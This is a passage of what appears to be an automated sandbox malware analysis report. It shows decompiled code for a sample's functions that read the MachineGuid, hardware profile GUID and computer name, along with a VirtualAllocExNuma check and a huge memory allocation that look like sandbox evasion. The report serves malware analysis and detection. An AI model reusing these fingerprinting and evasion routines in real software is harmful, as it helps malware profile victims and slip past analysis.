				return E0041DA9B(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
			}












                                                                    0x0041537d
                                                                    0x0041537d
                                                                    0x0041537e
                                                                    0x0041538b
                                                                    0x00415392
                                                                    0x004153a6
                                                                    0x004153ab
                                                                    0x004153b2
                                                                    0x004153b8
                                                                    0x004153d4
                                                                    0x004153dc
                                                                    0x004153f3
                                                                    0x004153f3
                                                                    0x004153fc
                                                                    0x0041540d
                                                                    0x00415416
                                                                    0x0041541d
                                                                    0x00415423
                                                                    0x00415425
                                                                    0x00415434
                                                                    0x00415441

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 004153B8
                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 004153D4
                                                                    • RegQueryValueExA.KERNELBASE(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 004153F3
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004153FC
                                                                    • CharToOemA.USER32(?,?), ref: 0041540D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                    • API String ID: 2235053359-1211650757
                                                                    • Opcode ID: 7c9d1be609c72eef7492457fd7233a669daaca6abee060ca290363d1ab2898d6
                                                                    • Instruction ID: 79db0e9b995936c0ac886c687ce2152ca6dcaabb93d803a11db3a993436d5866
                                                                    • Opcode Fuzzy Hash: 7c9d1be609c72eef7492457fd7233a669daaca6abee060ca290363d1ab2898d6
                                                                    • Instruction Fuzzy Hash: 5A114FB190024DAFDB30DFA4DC85BEE77ACEB05348F50402AE915D7151DB745A4C8B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 482 401000-401023 GetCurrentProcess VirtualAllocExNuma 483 401025-401026 ExitProcess 482->483 484 40102c-401042 VirtualAlloc 482->484 485 401044-401047 484->485 486 401049-40104f 484->486 485->486 487 401051-401071 call 426300 VirtualFree 486->487 488 401077-40107a 486->488 487->488
                                                                    C-Code - Quality: 32%
                                                                    			E00401000(void* __ecx) {
				void* _t2;
				void* _t3;
				void* _t5;
				void* _t11;

				_t2 =  *0x44645c(GetCurrentProcess(), 0, 0x7d0, 0x3000, 0x40, 0); // executed
				if(_t2 == 0) {
					ExitProcess(0);
				}
				_t3 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
				_t11 = _t3;
				_push(_t3);
				if(_t3 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t5);
				if(_t11 != 0) {
					E00426300(_t11, 0, 0x5e69ec0);
					_push(0);
					asm("cld");
					return VirtualFree(_t11, 0x17c841c0, 0x8000);
				}
				return _t5;
			}







                                                                    0x0040101b
                                                                    0x00401023
                                                                    0x00401026
                                                                    0x00401026
                                                                    0x00401036
                                                                    0x0040103c
                                                                    0x0040103e
                                                                    0x00401042
                                                                    0x00401046
                                                                    0x00401047
                                                                    0x0040104b
                                                                    0x0040104c
                                                                    0x0040104f
                                                                    0x0040105b
                                                                    0x00401063
                                                                    0x00401068
                                                                    0x00000000
                                                                    0x00401071
                                                                    0x0040107a

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 00401014
                                                                    • VirtualAllocExNuma.KERNELBASE(00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 0040101B
                                                                    • ExitProcess.KERNEL32 ref: 00401026
                                                                    • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 00401036
                                                                    • _memset.LIBCMT ref: 0040105B
                                                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,-5D2021DD,-5D2011DF,000000D5), ref: 00401071
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                    • String ID:
                                                                    • API String ID: 1859398019-0
                                                                    • Opcode ID: 17e8577ee365702da105d7d3bc05d200fb51b90a0ea4332338977c8909b93651
                                                                    • Instruction ID: 0be6df4a117c95e00e7a085d85633bddf6ec25a758a887222351dc0cae897ef5
                                                                    • Opcode Fuzzy Hash: 17e8577ee365702da105d7d3bc05d200fb51b90a0ea4332338977c8909b93651
                                                                    • Instruction Fuzzy Hash: F3F022F66012203BE6102B722CCCFAB1A8CDB07BA5F120039F605E3252C6398C0482BC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E24D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 491 41e24d-41e255 492 41e264-41e26f call 41dae4 491->492 495 41e271-41e272 492->495 496 41e257-41e262 call 4235e2 492->496 496->492 499 41e273-41e284 496->499 500 41e2b2-41e2cc call 41dc85 call 41ff86 499->500 501 41e286-41e2b1 call 41db78 call 41ed20 499->501 501->500
                                                                    C-Code - Quality: 93%
                                                                    			E0041E24D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char* _v8;
				signed int _v16;
				char _v20;
				void* __ebp;
				void* _t34;
				signed int _t35;
				signed int _t39;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t51;
				intOrPtr* _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t66;
				intOrPtr* _t68;

				_t66 = __esi;
				_t64 = __edi;
				_t63 = __edx;
				_t51 = __ebx;
				while(1) {
					_t34 = E0041DAE4(_t63, _t64, _t66, _a4); // executed
					if(_t34 != 0) {
						return _t34;
					}
					_t35 = E004235E2(_t34, _a4);
					__eflags = _t35;
					if(_t35 == 0) {
						__eflags =  *0x444cbc & 0x00000001;
						if(( *0x444cbc & 0x00000001) == 0) {
							 *0x444cbc =  *0x444cbc | 0x00000001;
							__eflags =  *0x444cbc;
							_push(1);
							_v8 = "bad allocation";
							E0041DB78(0x444cb0,  &_v8);
							 *0x444cb0 = 0x435264;
							E0041ED20( *0x444cbc, 0x434f95);
						}
						_t54 =  &_v20;
						E0041DC85(_t54, 0x444cb0);
						_v20 = 0x435264;
						E0041FF86( &_v20, 0x440c30);
						asm("int3");
						_t39 = _v16;
						_push(0x435264);
						_t68 = _t54;
						 *((char*)(_t68 + 0xc)) = 0;
						__eflags = _t39;
						if(__eflags != 0) {
							 *_t68 =  *_t39;
							_t32 = _t39 + 4; // 0x40427b
							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
						} else {
							_t42 = E00425F05(_t51, _t63, __eflags);
							 *((intOrPtr*)(_t68 + 8)) = _t42;
							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
							__eflags =  *_t68 -  *0x443df8; // 0x4be11a0
							if(__eflags != 0) {
								_t60 =  *0x443bb0; // 0xfffffffe
								__eflags =  *(_t42 + 0x70) & _t60;
								if(__eflags == 0) {
									 *_t68 = E00425CDC(_t51, _t63, 0x444cb0, _t68, __eflags);
								}
							}
							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x443ab8; // 0x4be1620
							if(__eflags != 0) {
								_t59 =  *0x443bb0; // 0xfffffffe
								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
								if(__eflags == 0) {
									 *((intOrPtr*)(_t68 + 4)) = E0042555B(_t51, _t63, 0x444cb0, _t68, __eflags);
								}
							}
							_t44 =  *((intOrPtr*)(_t68 + 8));
							__eflags =  *(_t44 + 0x70) & 0x00000002;
							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
								 *((char*)(_t68 + 0xc)) = 1;
							}
						}
						return _t68;
					} else {
						continue;
					}
					break;
				}
			}




















                                                                    0x0041e24d
                                                                    0x0041e24d
                                                                    0x0041e24d
                                                                    0x0041e24d
                                                                    0x0041e264
                                                                    0x0041e267
                                                                    0x0041e26f
                                                                    0x0041e272
                                                                    0x0041e272
                                                                    0x0041e25a
                                                                    0x0041e260
                                                                    0x0041e262
                                                                    0x0041e273
                                                                    0x0041e284
                                                                    0x0041e286
                                                                    0x0041e286
                                                                    0x0041e28d
                                                                    0x0041e295
                                                                    0x0041e29c
                                                                    0x0041e2a6
                                                                    0x0041e2ac
                                                                    0x0041e2b1
                                                                    0x0041e2b3
                                                                    0x0041e2b6
                                                                    0x0041e2c4
                                                                    0x0041e2c7
                                                                    0x0041e2cc
                                                                    0x0041e2d2
                                                                    0x0041e2d5
                                                                    0x0041e2d6
                                                                    0x0041e2d8
                                                                    0x0041e2dc
                                                                    0x0041e2de
                                                                    0x0041e345
                                                                    0x0041e347
                                                                    0x0041e34a
                                                                    0x0041e2e0
                                                                    0x0041e2e0
                                                                    0x0041e2e5
                                                                    0x0041e2eb
                                                                    0x0041e2f0
                                                                    0x0041e2f5
                                                                    0x0041e2fb
                                                                    0x0041e2fd
                                                                    0x0041e303
                                                                    0x0041e306
                                                                    0x0041e30d
                                                                    0x0041e30d
                                                                    0x0041e306
                                                                    0x0041e312
                                                                    0x0041e318
                                                                    0x0041e31d
                                                                    0x0041e323
                                                                    0x0041e326
                                                                    0x0041e32d
                                                                    0x0041e32d
                                                                    0x0041e326
                                                                    0x0041e330
                                                                    0x0041e333
                                                                    0x0041e337
                                                                    0x0041e339
                                                                    0x0041e33d
                                                                    0x0041e33d
                                                                    0x0041e337
                                                                    0x0041e351
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041e262

                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0041E267
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • std::exception::exception.LIBCMT ref: 0041E29C
                                                                    • std::exception::exception.LIBCMT ref: 0041E2B6
                                                                    • __CxxThrowException@8.LIBCMT ref: 0041E2C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                    • String ID: bad allocation
                                                                    • API String ID: 615853336-2104205924
                                                                    • Opcode ID: 35add48db3884d93d6b6b3c8959d8c19555fcfa2340bbeec03df38053064f1d5
                                                                    • Instruction ID: f02bcdf9e2ef460cc2c5a1bb44f72186bc1d9eafe83eb6c468dc195947b8b5b5
                                                                    • Opcode Fuzzy Hash: 35add48db3884d93d6b6b3c8959d8c19555fcfa2340bbeec03df38053064f1d5
                                                                    • Instruction Fuzzy Hash: BAF04975900209A7DB00EF53EC42AEE37A8AB80308F18006FF80095181CFBC9A80CB4C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 78%
                                                                    			E00415F45(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t53;
				intOrPtr _t70;
				intOrPtr _t72;
				void* _t74;

				_t63 = __ecx;
				_push(0xd8);
				E0042083E(E0043457F, __ebx, __edi, __esi);
				_t70 = __ecx;
				 *((intOrPtr*)(_t74 - 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(_t74 - 0x38)) = __ecx;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t74 - 0xe4)) = 0x43f688;
				 *((intOrPtr*)(_t74 - 0xd4)) = 0x43f678;
				 *((intOrPtr*)(_t74 - 0x84)) = 0x43f304;
				_t72 = 3;
				_push(_t74 - 0xcc);
				 *((intOrPtr*)(_t74 - 4)) = 1;
				_push(_t74 - 0xe4);
				 *((intOrPtr*)(_t74 - 0x34)) = _t72;
				E00414325(0, __ecx, _t72, 0); // executed
				_t13 =  *((intOrPtr*)(_t74 - 0xd4)) + 4; // 0x50
				 *((intOrPtr*)(_t74 +  *_t13 - 0xd4)) = 0x43f624;
				_t17 =  *((intOrPtr*)(_t74 - 0xe4)) + 4; // 0x60
				 *((intOrPtr*)(_t74 +  *_t17 - 0xe4)) = 0x43f62c;
				 *((intOrPtr*)(_t74 - 4)) = 5;
				_t22 =  *((intOrPtr*)(_t74 - 0xe4)) + 4; // 0x4401a8
				 *((intOrPtr*)(_t74 +  *_t22 - 0xe4)) = 0x43f684;
				_push(_t72);
				_push(_t74 - 0xcc);
				E00417359(0, _t72, 0);
				_push( *((intOrPtr*)(_t74 + 8)));
				_push(_t74 - 0xd4);
				 *((intOrPtr*)(_t74 - 4)) = 6;
				E00416879(0, _t63, _t70, _t72, 0);
				_t53 = E00416C31(_t74 - 0xe4, _t74 - 0x30);
				 *((char*)(_t74 - 4)) = 7;
				E004042ED(_t70, _t53);
				E00404354(_t74 - 0x30, 1, 0);
				 *((char*)(_t74 - 4)) = 0;
				E00416BF9(0, _t74 - 0x84, _t70, _t53, 0);
				 *((intOrPtr*)(_t74 - 0x84)) = 0x43f2fc;
				E0041D1C9(_t74 - 0x84);
				return E00420888(0, _t70, _t53);
			}







                                                                    0x00415f45
                                                                    0x00415f45
                                                                    0x00415f4f
                                                                    0x00415f54
                                                                    0x00415f58
                                                                    0x00415f5b
                                                                    0x00415f62
                                                                    0x00415f65
                                                                    0x00415f68
                                                                    0x00415f6a
                                                                    0x00415f74
                                                                    0x00415f7e
                                                                    0x00415f8a
                                                                    0x00415f91
                                                                    0x00415f98
                                                                    0x00415f9f
                                                                    0x00415fa0
                                                                    0x00415fa3
                                                                    0x00415fae
                                                                    0x00415fb1
                                                                    0x00415fc2
                                                                    0x00415fc5
                                                                    0x00415fd0
                                                                    0x00415fdd
                                                                    0x00415fe0
                                                                    0x00415feb
                                                                    0x00415ff2
                                                                    0x00415ff3
                                                                    0x00415ff8
                                                                    0x00416001
                                                                    0x00416002
                                                                    0x00416009
                                                                    0x00416018
                                                                    0x0041601f
                                                                    0x00416023
                                                                    0x0041602e
                                                                    0x00416039
                                                                    0x0041603c
                                                                    0x00416048
                                                                    0x00416052
                                                                    0x0041605f

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00415F4F
                                                                      • Part of subcall function 00414325: __EH_prolog3.LIBCMT ref: 0041432C
                                                                      • Part of subcall function 00417359: __EH_prolog3.LIBCMT ref: 00417360
                                                                      • Part of subcall function 00416879: __EH_prolog3_catch.LIBCMT ref: 00416880
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 00416BF9: __EH_prolog3.LIBCMT ref: 00416C00
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416052
                                                                      • Part of subcall function 0041D1C9: std::ios_base::_Tidy.LIBCPMT ref: 0041D1EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3$_memmovestd::ios_base::_$H_prolog3_H_prolog3_catchIos_base_dtorTidy
                                                                    • String ID: trA
                                                                    • API String ID: 4143508521-2959832044
                                                                    • Opcode ID: 30ca70afd20bbe590cd1f8f9cc94e7f33500932e757459f2e5cbab7673d55999
                                                                    • Instruction ID: f715c83aafc18979119b293aecec44ea6145d550c90bea030c81f590c4195d75
                                                                    • Opcode Fuzzy Hash: 30ca70afd20bbe590cd1f8f9cc94e7f33500932e757459f2e5cbab7673d55999
                                                                    • Instruction Fuzzy Hash: 5F31D9B1901159AFCB10EF99DA45BCDBBF4AB18308F5090ABE609A7251C7789A88CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004044A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 531 4044a3-4044ab 532 4044b7-4044bc 531->532 533 4044ad-4044b2 call 41cfa0 531->533 535 4044c9-4044cf 532->535 536 4044be-4044c2 call 4045b4 532->536 533->532 538 4044d1-4044d4 535->538 539 4044e9-4044eb 535->539 542 4044c7 536->542 538->539 543 4044d6-4044db 538->543 540 4044f9-404502 539->540 541 4044ed-4044f3 539->541 544 4044f5 541->544 545 4044f7 541->545 542->540 546 4044dd 543->546 547 4044df-4044e7 call 404354 543->547 544->545 545->540 546->547 547->540
                                                                    C-Code - Quality: 89%
                                                                    			E004044A3(void* __ebx, char* __ecx, void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t14;
				char* _t15;
				void* _t17;
				intOrPtr _t18;

				_t17 = __edi;
				_t15 = __ecx;
				_t14 = __ebx;
				_t18 = _a4;
				if(_t18 > 0xfffffffe) {
					E0041CFA0("string too long");
				}
				_t7 =  *((intOrPtr*)(_t15 + 0x14));
				_t21 = _t7 - _t18;
				if(_t7 >= _t18) {
					__eflags = _a8;
					if(_a8 == 0) {
						L9:
						__eflags = _t18;
						if(_t18 == 0) {
							 *((intOrPtr*)(_t15 + 0x10)) = 0;
							__eflags = _t7 - 0x10;
							if(_t7 >= 0x10) {
								_t15 =  *_t15;
							}
							 *_t15 = 0;
						}
						goto L13;
					}
					__eflags = _t18 - 0x10;
					if(_t18 >= 0x10) {
						goto L9;
					}
					_t10 =  *((intOrPtr*)(_t15 + 0x10));
					__eflags = _t18 - _t10;
					if(_t18 < _t10) {
						_t10 = _t18;
					}
					E00404354(_t15, 1, _t10);
					goto L13;
				} else {
					_push( *((intOrPtr*)(_t15 + 0x10)));
					_push(_t18); // executed
					E004045B4(_t14, _t15, _t17, _t18, _t21); // executed
					L13:
					asm("sbb eax, eax");
					return  ~0x00000000;
				}
			}










                                                                    0x004044a3
                                                                    0x004044a3
                                                                    0x004044a3
                                                                    0x004044a4
                                                                    0x004044ab
                                                                    0x004044b2
                                                                    0x004044b2
                                                                    0x004044b7
                                                                    0x004044ba
                                                                    0x004044bc
                                                                    0x004044cb
                                                                    0x004044cf
                                                                    0x004044e9
                                                                    0x004044e9
                                                                    0x004044eb
                                                                    0x004044ed
                                                                    0x004044f0
                                                                    0x004044f3
                                                                    0x004044f5
                                                                    0x004044f5
                                                                    0x004044f7
                                                                    0x004044f7
                                                                    0x00000000
                                                                    0x004044eb
                                                                    0x004044d1
                                                                    0x004044d4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004044d6
                                                                    0x004044d9
                                                                    0x004044db
                                                                    0x004044dd
                                                                    0x004044dd
                                                                    0x004044e2
                                                                    0x00000000
                                                                    0x004044be
                                                                    0x004044be
                                                                    0x004044c1
                                                                    0x004044c2
                                                                    0x004044f9
                                                                    0x004044fd
                                                                    0x00404502
                                                                    0x00404502

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004044B2
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFB5
                                                                      • Part of subcall function 0041CFA0: __CxxThrowException@8.LIBCMT ref: 0041CFCA
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                    • String ID: string too long
                                                                    • API String ID: 1823113695-2556327735
                                                                    • Opcode ID: 4339d4739821b1082f0794efc13e54746ce7590e2edae6a30565f95cf582e64e
                                                                    • Instruction ID: a64d84633e6199b04779e256df1ccb8a3a02977fafbb8fb7b7b785ce5c65a4e8
                                                                    • Opcode Fuzzy Hash: 4339d4739821b1082f0794efc13e54746ce7590e2edae6a30565f95cf582e64e
                                                                    • Instruction Fuzzy Hash: 8FF0FCF15041205ADB14A52D4D80B6A36415BD23187318D7BE6A1FF1C2C23DDC8297DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415326 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 550 415326-41535c GetCurrentHwProfileA 551 415364 550->551 552 41535e-415362 550->552 553 415369-41537c call 404331 call 41da9b 551->553 552->553
                                                                    C-Code - Quality: 58%
                                                                    			E00415326(intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v132;
				char _v136;
				void* __ebx;
				signed int _t8;
				int _t11;
				intOrPtr _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				signed int _t23;

				_t22 = __esi;
				_t21 = __edi;
				_t8 =  *0x443674; // 0x393162b1
				_v8 = _t8 ^ _t23;
				_v136 = 0;
				_t11 = GetCurrentHwProfileA( &_v132); // executed
				 *((intOrPtr*)(__esi + 0x14)) = 0xf;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				_t17 = __esi;
				 *((char*)(__esi)) = 0;
				if(_t11 == 0) {
					_push("Unknown");
				} else {
					_push( &(_v132.szHwProfileGuid));
				}
				E00404331(_t17);
				return E0041DA9B(_t22, 0, _v8 ^ _t23, _t20, _t21, _t22);
			}














                                                                    0x00415326
                                                                    0x00415326
                                                                    0x0041532f
                                                                    0x00415336
                                                                    0x00415340
                                                                    0x00415346
                                                                    0x0041534c
                                                                    0x00415353
                                                                    0x00415356
                                                                    0x00415358
                                                                    0x0041535c
                                                                    0x00415364
                                                                    0x0041535e
                                                                    0x00415361
                                                                    0x00415361
                                                                    0x00415369
                                                                    0x0041537c

                                                                    APIs
                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00415346
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProfile
                                                                    • String ID: Unknown
                                                                    • API String ID: 2104809126-1654365787
                                                                    • Opcode ID: 0c66456ff8185383b4ab4bdc4e19eec4a2b126090d89557c0130162dc813b6f4
                                                                    • Instruction ID: 0b7ba2daec30cbe8b273c448aad063ea9bd48d5a3dadf71705b7cee10d14c942
                                                                    • Opcode Fuzzy Hash: 0c66456ff8185383b4ab4bdc4e19eec4a2b126090d89557c0130162dc813b6f4
                                                                    • Instruction Fuzzy Hash: A7F08970A00709DFDB20DFB9D88169EB7F8BF08744F90057E9552D7241DB749A488755
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041522A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 558 41522a-415266 call 42e300 GetComputerNameA 561 415268 558->561 562 41526e-415279 call 41da9b 558->562 561->562
                                                                    C-Code - Quality: 87%
                                                                    			E0041522A(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				char _v32776;
				long _v32780;
				signed int _t9;
				int _t13;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t22;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				_t16 = __ebx;
				E0042E300(0x8008);
				_t9 =  *0x443674; // 0x393162b1
				_v8 = _t9 ^ _t22;
				_v32780 = 0x7fff;
				_t13 = GetComputerNameA( &_v32776,  &_v32780); // executed
				_t14 = "Unknown";
				if(_t13 != 0) {
					_t14 =  &_v32776;
				}
				return E0041DA9B(_t14, _t16, _v8 ^ _t22, _t19, _t20, _t21);
			}














                                                                    0x0041522a
                                                                    0x0041522a
                                                                    0x0041522a
                                                                    0x0041522a
                                                                    0x00415232
                                                                    0x00415237
                                                                    0x0041523e
                                                                    0x0041524f
                                                                    0x00415259
                                                                    0x00415261
                                                                    0x00415266
                                                                    0x00415268
                                                                    0x00415268
                                                                    0x00415279

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ComputerName
                                                                    • String ID: Unknown
                                                                    • API String ID: 3545744682-1654365787
                                                                    • Opcode ID: 731efd92db05fb85d45fabfc2e226234412909ee37f594d9104a00228a7c78be
                                                                    • Instruction ID: b772a0c3d20c8b889ad153f22bf8f6b2093c241ca24dfb85f84957339cd0868e
                                                                    • Opcode Fuzzy Hash: 731efd92db05fb85d45fabfc2e226234412909ee37f594d9104a00228a7c78be
                                                                    • Instruction Fuzzy Hash: 63E0C075A001189AC790DF59DD456CA73E8BB18708F4080B6A549D3241DE34AA4C4F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004045B4 Relevance: 3.1, APIs: 2, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004045B4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t30;
				signed int _t32;
				signed int _t34;
				signed int _t39;
				intOrPtr _t40;
				unsigned int _t42;
				unsigned int _t48;
				signed int _t51;
				signed int _t53;
				void* _t54;

				_push(0xc);
				E00420808(E0043396F, __ebx, __edi, __esi);
				_t53 = __ecx;
				 *((intOrPtr*)(_t54 - 0x18)) = __ecx;
				_t51 =  *(_t54 + 8) | 0x0000000f;
				if(_t51 <= 0xfffffffe) {
					_t39 = 3;
					_t42 =  *(__ecx + 0x14);
					 *(_t54 - 0x14) = _t42;
					 *(_t54 - 0x14) =  *(_t54 - 0x14) >> 1;
					_t48 =  *(_t54 - 0x14);
					if(_t48 > _t51 / _t39) {
						_t51 = 0xfffffffe;
						if(_t42 <= _t51 - _t48) {
							_t51 = _t48 + _t42;
						}
					}
				} else {
					_t51 =  *(_t54 + 8);
				}
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				_t16 = _t51 + 1; // 0xff
				_push(0);
				_t30 = E00404719(_t51, _t53, _t16); // executed
				 *(_t54 + 8) = _t30;
				_t40 =  *((intOrPtr*)(_t54 + 0xc));
				if(_t40 != 0) {
					if( *(_t53 + 0x14) < 0x10) {
						_t34 = _t53;
					} else {
						_t34 =  *_t53;
					}
					E00420090( *(_t54 + 8), _t34, _t40);
				}
				E00404354(_t53, 1, 0);
				_t32 =  *(_t54 + 8);
				 *_t53 = _t32;
				 *(_t53 + 0x14) = _t51;
				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
				if(_t51 < 0x10) {
					_t32 = _t53;
				}
				 *((char*)(_t32 + _t40)) = 0;
				return E00420874(_t32);
			}













                                                                    0x004045b4
                                                                    0x004045bb
                                                                    0x004045c0
                                                                    0x004045c2
                                                                    0x004045c8
                                                                    0x004045ce
                                                                    0x004045db
                                                                    0x004045de
                                                                    0x004045e1
                                                                    0x004045e4
                                                                    0x004045e7
                                                                    0x004045ec
                                                                    0x004045f0
                                                                    0x004045f7
                                                                    0x004045f9
                                                                    0x004045f9
                                                                    0x004045f7
                                                                    0x004045d0
                                                                    0x004045d0
                                                                    0x004045d0
                                                                    0x004045fc
                                                                    0x00404600
                                                                    0x00404603
                                                                    0x00404606
